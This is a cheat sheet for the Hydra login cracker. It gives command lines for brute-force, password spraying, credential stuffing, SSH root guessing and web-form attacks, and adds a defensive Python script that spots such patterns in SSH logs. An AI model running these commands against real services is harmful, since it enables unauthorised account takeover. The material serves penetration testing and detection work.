Hydra
Hydra is a parallelized login cracker that supports numerous protocols. It is a fast and flexible tool used to perform brute-force and dictionary attacks against authentication services.
Basic Usage
Brute-Force with User and Password Lists
This command attempts to find valid credentials by testing combinations from a user list (-L) and a password list (-P) against a specified service and target.
hydra -L user.list -P password.list <service>://<ip>
Brute-Force with a Single User
When the username is known, you can specify it with -l and provide a password list (-P) to find the correct password.
hydra -l username -P password.list <service>://<ip>
Brute-Force with a Single Password
If you suspect a specific password is being reused across multiple accounts, use -p to provide the password and -L for the list of usernames.
hydra -L user.list -p password <service>://<ip>
Credential Stuffing
The -C flag uses a file containing user:password pairs to test for credential reuse against a service, such as SSH.
hydra -C user_pass.list ssh://<ip>
Brute-Forcing SSH
This example targets the SSH service, attempting to log in as the root user by cycling through a password list.
hydra -l root -P /path/to/password_list.txt ssh://192.168.1.100
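Added example (not from the original page or the Hydra project): a defender-side check that groups failed SSH logins by source address and labels which of the modes above the traffic resembles. The function name, the threshold of four failures, and the log lines are assumptions constructed for illustration; the lines follow OpenSSH's "Failed password" message format.

```python
import re
from collections import defaultdict

# Constructed sample lines (documentation IP ranges), not real log data.
SAMPLE_LOG = """\
Jan 10 03:14:01 host sshd[811]: Failed password for root from 203.0.113.5 port 40112 ssh2
Jan 10 03:14:02 host sshd[811]: Failed password for root from 203.0.113.5 port 40113 ssh2
Jan 10 03:14:03 host sshd[811]: Failed password for root from 203.0.113.5 port 40114 ssh2
Jan 10 03:14:04 host sshd[811]: Failed password for root from 203.0.113.5 port 40115 ssh2
Jan 10 03:20:01 host sshd[812]: Failed password for alice from 198.51.100.7 port 5101 ssh2
Jan 10 03:20:02 host sshd[812]: Failed password for bob from 198.51.100.7 port 5102 ssh2
Jan 10 03:20:03 host sshd[812]: Failed password for invalid user carol from 198.51.100.7 port 5103 ssh2
Jan 10 03:20:04 host sshd[812]: Failed password for dave from 198.51.100.7 port 5104 ssh2
Jan 10 03:30:01 host sshd[813]: Failed password for admin from 192.0.2.9 port 6001 ssh2
Jan 10 03:30:02 host sshd[813]: Failed password for admin from 192.0.2.9 port 6002 ssh2
Jan 10 03:30:03 host sshd[813]: Failed password for invalid user test from 192.0.2.9 port 6003 ssh2
Jan 10 03:30:04 host sshd[813]: Failed password for invalid user test from 192.0.2.9 port 6004 ssh2
Jan 10 03:40:01 host sshd[814]: Failed password for alice from 192.0.2.50 port 7001 ssh2
Jan 10 03:40:09 host sshd[814]: Accepted password for alice from 192.0.2.50 port 7002 ssh2
"""

FAILED = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")

def classify(log_text, min_failures=4):
    """Return {source_ip: (label, total_failures, distinct_users)}."""
    per_ip = defaultdict(lambda: defaultdict(int))  # ip -> user -> failure count
    for line in log_text.splitlines():
        m = FAILED.search(line)
        if m:
            user, ip = m.groups()
            per_ip[ip][user] += 1
    findings = {}
    for ip, users in per_ip.items():
        total = sum(users.values())
        if total < min_failures:
            continue  # below the assumed threshold: more likely a mistyped password
        if len(users) == 1:
            label = "single-user guessing"   # shape of -l <user> -P <list>
        elif max(users.values()) == 1:
            # Logs hold no passwords, so -L/-p and -C pairs look the same here.
            label = "spray-or-stuffing"
        else:
            label = "list-by-list"           # shape of -L <list> -P <list>
        findings[ip] = (label, total, len(users))
    return findings

if __name__ == "__main__":
    for ip, result in classify(SAMPLE_LOG).items():
        print(ip, result)
```

Per-source grouping misses attempts spread across many addresses, so pair it with per-account failure counts and lockout or rate-limit controls on the service.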
Brute-Forcing a Web Login Form
This command targets an HTTP POST login form. The quoted argument has three colon-separated fields: the login page path, the request body format, and the failure condition. F=incorrect tells Hydra to treat any response containing "incorrect" as an unsuccessful attempt. ^USER^ and ^PASS^ are placeholders that Hydra replaces with credentials from the provided lists.
hydra -l admin -P /path/to/password_list.txt 127.0.0.1 http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect"